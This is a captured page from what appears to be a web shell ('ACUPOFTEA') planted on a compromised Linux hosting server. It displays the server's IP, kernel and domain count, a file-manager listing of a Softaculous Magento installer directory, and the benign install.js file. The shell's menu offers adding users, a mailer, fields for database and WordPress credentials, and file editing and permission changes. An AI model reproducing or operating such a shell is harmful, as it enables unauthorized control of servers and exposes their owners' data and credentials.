System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
magento242
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
install.js
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// // Check if there is a number in random generated password function update_admin_pass(){ if(typeof jQuery('#admin_pass').val() == "undefined"){ setTimeout('update_admin_pass();', 500); return; } var admin_pass = jQuery('#admin_pass').val(); var isnum = /\d+/.test(admin_pass); if(!isnum){ admin_pass = admin_pass+Math.floor((Math.random() * 10) + 1); jQuery('#admin_pass').val(admin_pass); } } update_admin_pass(); // Check if dbprefix is less than 6 chars function update_dbprefix(){ if(typeof jQuery('#dbprefix').val() == "undefined"){ setTimeout('update_dbprefix();', 500); return; } var dbprefix = jQuery('#dbprefix').val(); var length = dbprefix.length; if(length > 5){ newdbprefix = dbprefix.substring(0, 4); jQuery('#dbprefix').val(newdbprefix+"_"); } } setTimeout('update_dbprefix();', 1000); function formcheck(){ if($('dbprefix').value.length > 5){ alert('{{err_dbprefixlen}}'); return false; } //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; }; jQuery(document).ready(function(){ jQuery('#softsubmitbut').click(function(){ var r = confirm('{{err_confirm_email}}'); if (r == true) { return true; } else { return false; } }); });
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-25 09:48:10
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2024-06-25 09:48:10
php53
DIR
-
drwxr-xr-x
2024-06-25 09:48:10
php56
DIR
-
drwxr-xr-x
2024-06-25 09:48:10
php71
DIR
-
drwxr-xr-x
2024-06-25 09:48:10
php81
DIR
-
drwxr-xr-x
2024-06-25 09:48:10
php82
DIR
-
drwxr-xr-x
2024-06-25 09:48:10
.htaccess
text/plain
214 B
-rw-r--r--
2021-12-23 06:54:36
Notes.txt
text/plain
3.36 KB
-rw-r--r--
2021-12-23 06:54:36
_config.php
text/x-php
14.04 KB
-rw-r--r--
2021-12-23 06:54:36
changelog.txt
text/plain
85.57 KB
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
6.8 KB
-rw-r--r--
2024-05-02 07:41:42
config.php
text/x-php
13.24 KB
-rw-r--r--
2021-12-23 06:54:36
di.xml
text/xml
127.36 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
4.38 KB
-rw-r--r--
2024-05-02 07:41:42
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
env.php
text/x-php
2.05 KB
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
324 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
6.37 KB
-rw-r--r--
2024-05-02 07:41:42
info.xml
text/html
4.61 KB
-rw-r--r--
2024-05-02 06:25:50
install.js
text/plain
2.02 KB
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
15.63 KB
-rw-r--r--
2024-05-02 07:41:42
install.xml
text/html
1.67 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
4.16 KB
-rw-r--r--
2024-05-02 07:41:42
pub_.htaccess
text/x-Algol68
8.2 KB
-rw-r--r--
2021-12-23 06:54:36
pubstatic_.htaccess
text/plain
3.71 KB
-rw-r--r--
2021-12-23 06:54:36
remove.php
text/x-php
2.53 KB
-rw-r--r--
2024-05-02 07:41:42
~ ACUPOFTEA - mail.ontime-ae.com